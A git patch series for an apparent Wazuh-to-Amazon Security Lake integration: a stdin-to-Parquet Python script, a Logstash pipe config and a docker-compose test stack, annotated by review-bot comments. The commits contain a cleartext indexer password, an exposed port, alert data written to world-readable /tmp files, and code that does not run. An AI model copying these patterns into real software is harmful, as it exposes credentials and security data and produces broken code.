@@ -70,6 +70,15 @@ def get_elapsedseconds(reference_timestamp): else: output_buffer += current_block + if len(output_buffer) == 0: + continue + + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + logging.info('Writing data to parquet file') + encode_parquet(output_buffer,args.outputfolder,'wazuh-{}'.format(date)) + starttimestamp = datetime.datetime.now(datetime.timezone.utc) + output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) From 67b785f0f2c5aeb118aa27003e6c0b01cad83ecc Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 15:38:04 -0300 Subject: [PATCH 22/77] Initial commit for test env's docker-compose.yml --- .../stdin_to_securitylake.py | 1 - integrations/docker/docker-compose.yml | 117 ++++++++++++++++++ 2 files changed, 117 insertions(+), 1 deletion(-) create mode 100644 integrations/docker/docker-compose.yml diff --git a/integrations/amazon-security-lake/stdin_to_securitylake.py b/integrations/amazon-security-lake/stdin_to_securitylake.py index ec90025d9afa3..eee82036c3ff5 100755 --- a/integrations/amazon-security-lake/stdin_to_securitylake.py +++ b/integrations/amazon-security-lake/stdin_to_securitylake.py @@ -15,7 +15,6 @@ def encode_parquet(list,foldername,filename): try: table = Table.from_pylist(list) - print(table) parquet.write_table(table, '{}/{}.parquet'.format(foldername,filename)) except Exception as e: logging.error(e) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml new file mode 100644 index 0000000000000..ebd6b348c5116 --- /dev/null +++ b/integrations/docker/docker-compose.yml 
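Review bot: the loop has no exit path: on a blocking pipe or file `readline()` returns `''` only after the writer has closed it, so once EOF is reached every iteration yields `[block_ending]`, hits `continue` or sleeps, and the process polls forever while the buffered events wait up to `pushinterval` seconds; if the Logstash `pipe` output's `ttl` from `pipe-output.conf` is used, each respawn presumably leaves one such orphan behind. Treat the sentinel as end of input: flush what is buffered and break. The `try`/`while` opening this loop and the `except KeyboardInterrupt` after it sit partly outside the hunk.
```python
                if current_block[-1] == block_ending:
                    output_buffer += current_block[0:-1]
                    # '' from readline() means the writer closed the pipe:
                    # write whatever is buffered and stop instead of polling
                    if output_buffer:
                        encode_parquet(output_buffer, args.outputfolder, 'wazuh-{}'.format(date))
                    break
                output_buffer += current_block
                # … unchanged: size / interval flush …
```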
@@ -0,0 +1,117 @@ +version: "3.8" + +services: + + events-generator: + image: events-generator + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y python3-requests + container_name: events-generator + volumes: + - ../tools/events-generator:/home/events-generator + hostname: events-generator + working_dir: "/home/events-generator" + entrypoint: sh -c "python3 run.py" + networks: + wazuh-indexer-dev: + aliases: + - events-generator + ipv4_address: 172.18.0.2 + depends_on: + - wazuh-indexer + + wazuh-indexer: + image: wazuh/wazuh-indexer:4.8.0-beta1 + container_name: wazuh-indexer + hostname: wazuh-indexer + restart: always + networks: + wazuh-indexer-dev: + aliases: + - wazuh-indexer + ipv4_address: 172.18.0.3 + ports: + - "9222:9200" + depends_on: + - generator + environment: + - "OPENSEARCH_JAVA_OPTS=-Xms1g -Xmx1g" + - "bootstrap.memory_lock=true" + - 'INDEXER_PASSWORD=SecretPassword' + ulimits: + memlock: + soft: -1 + hard: -1 + nofile: + soft: 65536 + hard: 65536 + volumes: + - ./wazuh-indexer-data:/var/lib/wazuh-indexer + - ./config/wazuh_indexer_ssl_certs/root-ca.pem:/usr/share/wazuh-indexer/certs/root-ca.pem + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer-key.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.key + - ./config/wazuh_indexer_ssl_certs/wazuh1.indexer.pem:/usr/share/wazuh-indexer/certs/wazuh1.indexer.pem + - ./config/wazuh_indexer_ssl_certs/admin.pem:/usr/share/wazuh-indexer/certs/admin.pem + - ./config/wazuh_indexer_ssl_certs/admin-key.pem:/usr/share/wazuh-indexer/certs/admin-key.pem + - ./config/wazuh_indexer/wazuh1.indexer.yml:/usr/share/wazuh-indexer/opensearch.yml + - ./config/wazuh_indexer/internal_users.yml:/usr/share/wazuh-indexer/opensearch-security/internal_users.yml + + generator: + image: wazuh/wazuh-certs-generator:0.0.1 + hostname: wazuh-certs-generator + volumes: + - ./config/wazuh_indexer_ssl_certs/:/certificates/ + - ./config/certs.yml:/config/certs.yml + environment: + - 
HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS + + logstash: + image: logstash + build: + dockerfile_inline: | + FROM ubuntu:20.04 + RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https + WORKDIR /home/logstash + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + apt update && \ + apt install -y logstash && \ + chown -R logstash:logstash /etc/logstash && \ + chown logstash:logstash /home/logstash + entrypoint: /usr/share/bin/logstash --path.settings /etc/logstash --config.reload.automatic + container_name: logstash + hostname: logstash + user: logstash + volumes: + - ../amazon-security-lake:/home/logstash + - ../amazon-security-lake/logstash/pipe-output.conf:/etc/logstash/conf.d/pipe-output.conf + - ../amazon-security-lake/logstash/pipelines.yml:/etc/logstash/pipelines.yml + networks: + wazuh-indexer-dev: + aliases: + - logstash + ipv4_address: 172.18.0.4 + depends_on: + - wazuh-indexer + - s3-ninja + + s3-ninja: + image: scireum/s3-ninja + container_name: s3-ninja + hostname: s3-ninja + volumes: + - ./s3-ninja_data:/home/sirius/data + networks: + wazuh-indexer-dev: + aliases: + - s3-ninja + ipv4_address: 172.18.0.5 + ports: + - "9444:9000" + +networks: + wazuh-indexer-dev: + ipam: + config: + - subnet: "172.18.0.0/16" From 0bf697df314e58cb3818ea2aef72ff3b685b6fa5 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 19 Feb 2024 16:52:36 -0300 Subject: [PATCH 23/77] Remove sudo references from docker-compose.yml --- integrations/docker/docker-compose.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/docker/docker-compose.yml b/integrations/docker/docker-compose.yml index ebd6b348c5116..dd7f12f119e05 100644 --- a/integrations/docker/docker-compose.yml 
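Review bot: `INDEXER_PASSWORD=SecretPassword` is committed in clear text and `wazuh-indexer` publishes `9222` on every host interface, so this stack exposes an indexer with a known password to whatever network the host is on; read it from the environment, `- INDEXER_PASSWORD=${INDEXER_PASSWORD:?set INDEXER_PASSWORD}`, and bind to loopback, `- "127.0.0.1:9222:9200"`. The inline logstash Dockerfile installs whatever `apt install -y logstash` resolves from the 8.x repo at build time, so builds drift — pin the package version. `entrypoint: /usr/share/bin/logstash` looks like a typo for the package's `/usr/share/logstash/bin/logstash` (confirm), and `HTTP_PROXY=YOUR_PROXY_ADDRESS_OR_DNS` is a placeholder that will be used verbatim. `depends_on` only orders container start, so the indexer may come up before `generator` has written the certificates it mounts.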
+++ b/integrations/docker/docker-compose.yml @@ -73,8 +73,8 @@ services: FROM ubuntu:20.04 RUN apt update && apt install -y iputils-ping wget gpg apt-transport-https WORKDIR /home/logstash - RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ - echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ + RUN wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | gpg --dearmor -o /usr/share/keyrings/elastic-keyring.gpg && \ + echo "deb [signed-by=/usr/share/keyrings/elastic-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | tee -a /etc/apt/sources.list.d/elastic-8.x.list && \ apt update && \ apt install -y logstash && \ chown -R logstash:logstash /etc/logstash && \ From 159adcb5e33ab0d3b99fd274f00a0e38028b075d Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:47:23 -0300 Subject: [PATCH 24/77] Adding Python script that receives a continuous json stream over stdin and outputs parquet to Security Lake --- integrations/stdin_to_securitylake.py | 86 +++++++++++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100755 integrations/stdin_to_securitylake.py diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py new file mode 100755 index 0000000000000..fd70e41906ccb --- /dev/null +++ b/integrations/stdin_to_securitylake.py 
@@ -0,0 +1,86 @@ +#!/usr/bin/env python3 + +import os +import sys +import argparse +import logging +import time +from datetime import datetime +from pyarrow import json +import pyarrow.parquet as pq + +def encode_parquet(json_list): + for json in json_list: + ### read_json is meant for files, need to change it to read from a string + ### https://arrow.apache.org/docs/python/json.html + table = json.read_json(json) + pq.write_table(table, 'parquet/output.parquet') + +def push_to_s3(parquet): + ## Fill with AWS S3 code + pass + +def read_chunk(fileobject,length): + output=[] + for i in range(0,length): + line = fileobject.readline() + if line is '': + output.append(line) + break + output.append(line) + return output + +def get_elapsedtime(reference_timestamp): + current_time = datetime.now(tz='UTC') + return (current_time - reference_timestamp).total_seconds() + +if __name__ == "__main__": + + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H:%M:%S') + + parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') + + parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') + + debugging = parser.add_argument_group('debugging') + debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') + debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') + + args = parser.parse_args() + + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.debug("Running main()") + logging.debug("Current time is " + str(clockstr) ) + + try: + 
logging.info('BUFFERING STDIN') + + with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: + + output_buffer = [] + + starttimestamp = datetime.now(tz='UTC') + + try: + while True: + output_buffer.append(read_chunk(stdin,args.linebuffer)) + if output_buffer[len(output_buffer)-1] is '': + time.sleep(args.sleeptime) + if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: + encode_parquet(output_buffer) + logging.debug(output_buffer) + starttimestamp = datetime.now(tz='UTC') + output_buffer = [] + except KeyboardInterrupt: + logging.info("Keyboard Interrupt issued") + exit(0) + + + logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: + logging.error("Error running script") + exit(1) From 6e17aae0dc430737a6f73d239dd991b6b219d418 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Mon, 5 Feb 2024 15:50:39 -0300 Subject: [PATCH 25/77] Adding logstash pipeline for python script --- .../amazon-security-lake/pipe-output.conf | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 integrations/amazon-security-lake/pipe-output.conf diff --git a/integrations/amazon-security-lake/pipe-output.conf b/integrations/amazon-security-lake/pipe-output.conf new file mode 100644 index 0000000000000..4f64eb5a46a54 --- /dev/null +++ b/integrations/amazon-security-lake/pipe-output.conf @@ -0,0 +1,35 @@ +input { + opensearch { + hosts => ["127.0.0.1:9200"] + user => "${WAZUH_INDEXER_USERNAME}" + password => "${WAZUH_INDEXER_PASSWORD}" + index => "wazuh-alerts-4.x-*" + ssl => true + ca_file => "/etc/logstash/wi-certs/root-ca.pem" + query => '{ + "query": { + "range": { + "@timestamp": { + "gt": "now-1m" + } + } + } + }' + target => "_source" + schedule => "* * * * *" + } +} + +output { + + stdout { codec => rubydebug } + + pipe + { + id => "securityLake" + message_format => "%{_source}" + ttl => "10" + command => "/usr/bin/env python3 /usr/local/bin/stdin_to_securitylake.py -d" + } + +} 
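Review bot: this file does not parse: each of the four `parser.add_argument(..., default=10 help='...')` calls is missing the comma before `help`, so Python raises `SyntaxError` before anything runs. Beyond that, `datetime.now(tz='UTC')` needs a `tzinfo` rather than a string (`TypeError`), `os.fdopen(..., 'rt', buffering=0)` is rejected for text mode (`ValueError`), `line is ''` compares identity instead of equality, and `for json in json_list` rebinds the imported `json` module before `json.read_json(json)` is called. `logging.debug(output_buffer)` also writes every buffered alert to the `/tmp` log file.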
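Review bot: the `opensearch` input re-runs `@timestamp > now-1m` on a `* * * * *` schedule with no cursor, so scheduling jitter either re-reads events at the window edge (duplicates in Security Lake) or skips them; track the last timestamp seen, or widen the window and de-duplicate on the document id downstream. `stdout { codec => rubydebug }` prints every alert to Logstash's stdout in what is meant as a production pipeline — remove it or keep it for development only, as presumably the `-d` flag on the `command` is. With `ttl => "10"` Logstash closes the pipe after 10 idle seconds, so the script must treat EOF on stdin as "flush and exit" rather than keep polling.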
From a05c23c080f6592fc5a4a53617983d558cebb752 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:23:34 -0300 Subject: [PATCH 26/77] encode_parquet() function fixed to handle lists of dictionaries --- integrations/stdin_to_securitylake.py | 65 ++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index fd70e41906ccb..a8295ed139262 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -5,16 +5,15 @@ import argparse import logging import time +import json from datetime import datetime -from pyarrow import json -import pyarrow.parquet as pq +from pyarrow import json, parquet, Table -def encode_parquet(json_list): - for json in json_list: - ### read_json is meant for files, need to change it to read from a string - ### https://arrow.apache.org/docs/python/json.html - table = json.read_json(json) - pq.write_table(table, 'parquet/output.parquet') +chunk_ending = { "chunk_ending": True } + +def encode_parquet(list): + table = Table.from_pylist(list) + pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code 
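Review bot: `from pyarrow import json, parquet, Table` rebinds the `json` name that `import json` just bound, so `json.loads(line)` in `read_chunk` resolves to `pyarrow.json`, which has no `loads`, and `pq.write_table` refers to a name that is no longer imported (`NameError` on the first flush). `encode_parquet` also writes to the predictable, world-readable `/tmp/<timestamp>.parquet`: alert data lands where any local user can read it, and if the script runs as root an attacker can pre-create that path; write into a dedicated directory with restricted permissions or use `tempfile.mkstemp` and move the file into place.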
@@ -24,63 +23,57 @@ def read_chunk(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() - if line is '': - output.append(line) + if line == '': + output.append(chunk_ending) break - output.append(line) + output.append(json.loads(line)) return output -def get_elapsedtime(reference_timestamp): +def get_elapsedseconds(reference_timestamp): current_time = datetime.now(tz='UTC') return (current_time - reference_timestamp).total_seconds() - -if __name__ == "__main__": - - clock = datetime.now(tz='UTC') - clockstr = clock.strftime('%F_%H:%M:%S') +def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - - parser.add_argument('-n','--linebuffer', action='store', default=10 help='Lines to buffer') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Lines to buffer') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Lines to buffer') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Lines to buffer') - + parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') + parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') + parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') + parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') - args = parser.parse_args() - - logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) - 
logging.debug("Running main()") - logging.debug("Current time is " + str(clockstr) ) +if __name__ == "__main__": + clock = datetime.now(tz='UTC') + clockstr = clock.strftime('%F_%H.%M.%S') + parse_arguments() + logging.basicConfig(format='%(asctime)s %(message)s',filename=args.output, encoding='utf-8', level=logging.DEBUG) + logging.info('BUFFERING STDIN') + try: - logging.info('BUFFERING STDIN') with os.fdopen(sys.stdin.fileno(), 'rt', buffering=0) as stdin: - output_buffer = [] - starttimestamp = datetime.now(tz='UTC') try: while True: output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] is '': + if output_buffer[len(output_buffer)-1] == chunk_ending : time.sleep(args.sleeptime) - if len(output_buffer) > args.maxlength or get_elapsedtime(starttimestamp) > args.pushinterval: - encode_parquet(output_buffer) - logging.debug(output_buffer) + if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: + push_to_s3(encode_parquet(output_buffer)) + logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") exit(0) - logging.info('FINISHED RETRIEVING STDIN') + except Exception as e: logging.error("Error running script") exit(1) From e04f0d53846556fbeb3a6eced7e71fc77b509344 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:25:13 -0300 Subject: [PATCH 27/77] Correct error in encode_parquet() --- integrations/stdin_to_securitylake.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index a8295ed139262..e11c23378b15b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
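Review bot: `parse_arguments()` assigns `args` locally and returns nothing, and `__main__` discards its result anyway, so `args.output` on the `logging.basicConfig` line raises `NameError`; end the function with `return parser.parse_args()` and call it as `args = parse_arguments()`. The `default=10 help=...` calls still lack the comma before `help`, which is a `SyntaxError`. `output_buffer.append(read_chunk(...))` appends the whole chunk as one nested element, so `output_buffer[len(output_buffer)-1] == chunk_ending` compares a list with a dict and is never true, and `Table.from_pylist` later receives a list of lists.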
@@ -7,13 +7,13 @@ import time import json from datetime import datetime -from pyarrow import json, parquet, Table +from pyarrow import parquet, Table chunk_ending = { "chunk_ending": True } def encode_parquet(list): table = Table.from_pylist(list) - pq.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) def push_to_s3(parquet): ## Fill with AWS S3 code From 93935fc24dd0fe5d2a1519d0b5ec01e51cb05994 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 13:59:12 -0300 Subject: [PATCH 28/77] Avoid storing the block ending in the output buffer --- integrations/stdin_to_securitylake.py | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index e11c23378b15b..034b729c1208d 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -9,7 +9,10 @@ from datetime import datetime from pyarrow import parquet, Table -chunk_ending = { "chunk_ending": True } +block_ending = { "block_ending": True } + +def map_to_ocsf(): + ## Code that translates fields to OCSF def encode_parquet(list): table = Table.from_pylist(list) @@ -19,12 +22,12 @@ def push_to_s3(parquet): ## Fill with AWS S3 code pass -def read_chunk(fileobject,length): +def read_block(fileobject,length): output=[] for i in range(0,length): line = fileobject.readline() if line == '': - output.append(chunk_ending) + output.append(block_ending) break output.append(json.loads(line)) return output 
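Review bot: `def map_to_ocsf():` is followed only by the `## Code that translates fields to OCSF` comment and has no body, so the module fails to compile (`IndentationError: expected an indented block`) and nothing in this file can be imported or run; put `raise NotImplementedError  # TODO: OCSF field mapping` under the comment until the mapping exists.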
@@ -59,14 +62,16 @@ def parse_arguments(): try: while True: - output_buffer.append(read_chunk(stdin,args.linebuffer)) - if output_buffer[len(output_buffer)-1] == chunk_ending : + current_block = read_block(stdin,args.linebuffer) + if current_block[-1] == block_ending : + output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: push_to_s3(encode_parquet(output_buffer)) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] + output_buffer.append(current_block) except KeyboardInterrupt: logging.info("Keyboard Interrupt issued") From 1db384c0da0b0b2f60173861aa87a1c27e05494b Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:40:01 -0300 Subject: [PATCH 29/77] Add comments on handling files and streams with pyarrow for future reference --- integrations/stdin_to_securitylake.py | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 034b729c1208d..1604bc2ed9ebc 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -15,13 +15,14 @@ def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): + ### We can write directly to S3 from pyarrow: + ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### + ### Credentials can be stored in /root/.aws/credentials + ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html table = Table.from_pylist(list) parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) -def push_to_s3(parquet): - ## Fill with AWS S3 code - pass - def read_block(fileobject,length): output=[] for i in range(0,length): 
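Review bot: The trailing `output_buffer.append(current_block)` appends the block as one nested list, so `output_buffer` ends up holding lists rather than alert dicts, `len(output_buffer) > args.maxlength` counts blocks instead of events, and `Table.from_pylist` downstream receives the wrong shape. On the EOF branch the same alerts are also added twice — once via the `+=` slice and again by the `append`, which this time carries the `block_ending` sentinel as well. Replace both lines with a single `output_buffer.extend(b for b in current_block if b != block_ending)` placed before the `if`, and keep only the sleep/flush logic in the branch. The enclosing `__main__` loop starts and ends outside the hunk.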
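Review bot: The new comment recommends keeping AWS credentials in `/root/.aws/credentials`, which implies running the pipeline as root; a script that only reads stdin and writes Parquet does not need that, and a long-lived access key in root's home is a poor fit when the AWS SDK credential chain that pyarrow uses already resolves instance/task IAM roles and the `AWS_*` environment variables without any file. Suggest rewording to `### Credentials are resolved by the AWS SDK default chain (IAM role, AWS_* env vars, or ~/.aws/credentials of the unprivileged service user)`. The `parquet.write_table(..., '/tmp/{}.parquet'...)` context line still overwrites one fixed file per run, as noted on `@@ -7,13 +7,13 @@`.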
@@ -62,12 +63,18 @@ def parse_arguments(): try: while True: + ### We can possibly replace all the custom code here + ### and just use Arrow's built-in input and output facilities: + ### * https://arrow.apache.org/docs/python/memory.html#input-and-output + ### * https://arrow.apache.org/docs/python/ipc.html#reading-from-stream-and-file-format-for-pandas + ### * https://stackoverflow.com/questions/52945609/pandas-dataframe-to-parquet-buffer-in-memory + current_block = read_block(stdin,args.linebuffer) if current_block[-1] == block_ending : output_buffer += current_block[0:current_block.index(block_ending)] time.sleep(args.sleeptime) if len(output_buffer) > args.maxlength or get_elapsedseconds(starttimestamp) > args.pushinterval: - push_to_s3(encode_parquet(output_buffer)) + encode_parquet(output_buffer) logging.debug(json.dumps(output_buffer)) starttimestamp = datetime.now(tz='UTC') output_buffer = [] From c60045fbcf5a7ebd55be6054969f0f4c0fc3c46f Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 16:56:27 -0300 Subject: [PATCH 30/77] Add s3 handling reference links --- integrations/stdin_to_securitylake.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index 1604bc2ed9ebc..d176bb38b004e 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py 
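Review bot: `logging.debug(json.dumps(output_buffer))` serialises every buffered alert — including `full_log`, which carries raw request data — into the log file, and the logger is configured with `level=logging.DEBUG` unconditionally, so as far as the visible lines show the `--debug` flag does not gate it. Each pushed batch is therefore duplicated into a predictably named file under `/tmp` that is typically readable by other local users. Log a count instead, `logging.debug('flushing %d events', len(output_buffer))`, and put any full event dump behind the `--debug` flag if it is needed at all. The enclosing `__main__` loop starts and ends outside the hunk.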
@@ -7,16 +7,19 @@ import time import json from datetime import datetime -from pyarrow import parquet, Table +from pyarrow import parquet, Table, fs block_ending = { "block_ending": True } +s3 = fs.S3FileSystem(region='eu-west-3') + def map_to_ocsf(): ## Code that translates fields to OCSF def encode_parquet(list): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 + ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html From 8949097be444871ed6db264c1133c1d005f6fdf3 Mon Sep 17 00:00:00 2001 From: Fede Tux Date: Tue, 6 Feb 2024 17:03:00 -0300 Subject: [PATCH 31/77] Write parquet directly to bucket --- integrations/stdin_to_securitylake.py | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/integrations/stdin_to_securitylake.py b/integrations/stdin_to_securitylake.py index d176bb38b004e..2b8a1de14755b 100755 --- a/integrations/stdin_to_securitylake.py +++ b/integrations/stdin_to_securitylake.py @@ -16,15 +16,16 @@ def map_to_ocsf(): ## Code that translates fields to OCSF -def encode_parquet(list): +def encode_parquet(list,bucket_name,folder): ### We can write directly to S3 from pyarrow: ### https://arrow.apache.org/docs/python/filesystems.html#s3 ### https://arrow.apache.org/docs/python/generated/pyarrow.fs.S3FileSystem.html#pyarrow.fs.S3FileSystem.open_output_stream ### ### Credentials can be stored in /root/.aws/credentials ### https://docs.aws.amazon.com/sdk-for-cpp/v1/developer-guide/credentials.html + table = Table.from_pylist(list) - parquet.write_table(table, '/tmp/{}.parquet'.format(clockstr)) + parquet.write_to_dataset(table, root_path='s3://{}/{}'.format(bucket_name,folder)) def read_block(fileobject,length): output=[] 
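Review bot: `s3 = fs.S3FileSystem(region='eu-west-3')` hard-codes a region and constructs the client at import time, so it runs even for `--help` and before any argument is parsed; none of the visible hunks use `s3` afterwards (the next commit writes through `root_path='s3://...'` instead). Make the region a CLI option next to the bucket name, e.g. `parser.add_argument('-r','--region', action='store', help='AWS region of the output bucket')`, and build the filesystem inside the `__main__` block, or drop the module-level object entirely.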
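Review bot: `encode_parquet(list,bucket_name,folder)` interpolates `bucket_name` and `folder` straight into `'s3://{}/{}'`, and both arrive from `-b`/`-f` options that have neither a default nor `required=True` (see `@@ -42,10 +43,12 @@`), so omitting them yields `s3://None/None` and an opaque pyarrow error at the first flush rather than a usage error at startup. Add `required=True` to those two options, or validate at the top of the function: `if not bucket_name or not folder: raise ValueError('bucket name and folder are required')`. The same unchecked values are forwarded by the call site in `@@ -77,7 +80,7 @@`. The parameter named `list` still shadows the builtin.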
@@ -42,10 +43,12 @@ def get_elapsedseconds(reference_timestamp): def parse_arguments(): parser = argparse.ArgumentParser(description='STDIN to Security Lake pipeline') - parser.add_argument('-n','--linebuffer', action='store', default=10 help='stdin line buffer length') - parser.add_argument('-m','--maxlength', action='store', default=20 help='Event number threshold for submission to Security Lake') - parser.add_argument('-s','--sleeptime', action='store', default=5 help='Input buffer polling interval') - parser.add_argument('-i','--pushinterval', action='store', default=299 help='Time interval for pushing data to Security Lake') + parser.add_argument('-b','--bucketname', action='store', help='Name of the output S3 bucket') + parser.add_argument('-f','--foldername', action='store', help='Name of the output S3 bucket\'s folder') + parser.add_argument('-i','--pushinterval', action='store', default=299, help='Time interval for pushing data to Security Lake') + parser.add_argument('-m','--maxlength', action='store', default=20, help='Event number threshold for submission to Security Lake') + parser.add_argument('-n','--linebuffer', action='store', default=10, help='stdin line buffer length') + parser.add_argument('-s','--sleeptime', action='store', default=5, help='Input buffer polling interval') debugging = parser.add_argument_group('debugging') debugging.add_argument('-o','--output', type=str, default="/tmp/{}_stdintosecuritylake.txt".format(clockstr), help='File path of the destination file to write to') debugging.add_argument('-d','--debug', action='store_true', help='Activate debugging') 
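Review bot: The numeric options `-i`, `-m`, `-n` and `-s` are declared with `action='store'` but no `type=int`, so whenever a user passes one of them its value is a `str` while the default stays an `int`; `range(0, length)` in `read_block`, `time.sleep(args.sleeptime)` and `len(output_buffer) > args.maxlength` then raise TypeError. Add `type=int` to each, e.g. `parser.add_argument('-n','--linebuffer', action='store', type=int, default=10, help='stdin line buffer length')`. `-b`/`-f` have no default and are not `required=True`, so the bucket target can silently be `None`. `parse_arguments` starts outside the hunk, so it is not visible whether it returns the parsed args or sets a global.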
